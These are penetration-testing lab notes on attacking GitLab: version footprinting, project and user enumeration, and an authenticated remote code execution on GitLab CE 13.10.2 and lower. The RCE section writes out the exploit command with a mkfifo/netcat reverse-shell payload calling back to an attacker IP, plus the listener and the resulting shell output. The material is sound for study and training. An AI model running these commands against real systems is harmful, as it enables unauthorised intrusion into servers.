GitLab

Footprinting & Discovery

http://gitlab.inlanefreight.local:8081/users/sign_in

The only way to footprint the GitLab version number in use is by browsing to the /help page when logged in

Enumeration

Browse to /explore and see if there are any public projects that may contain something interesting.

Check and see if we can register an account and access additional projects

User Enumeration

http://gitlab.inlanefreight.local:8081/users/sign_up

GitLab's defaults are set to 10 failed attempts resulting in an automatic unlock after 10 minutes 

./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

Authenticated Remote Code Execution

GitLab Community Edition version 13.10.2 and lower suffered from an authenticated remote code execution

If we encounter a vulnerable version of GitLab that allows for self-registration, we can quickly sign up for an account and pull off the attack. Else, OSINT or password guessing

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '

[1] Authenticating
Successfully Authenticated
[2] Creating Payload 
[3] Creating Snippet and Uploading
[+] RCE Triggered !!
nc -lnvp 8443

listening on [any] 8443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.88] 60054

git@app04:~/gitlab-workhorse$ id

id
uid=996(git) gid=997(git) groups=997(git)

Resources

PreviousosTicketNextColdFusion

Last updated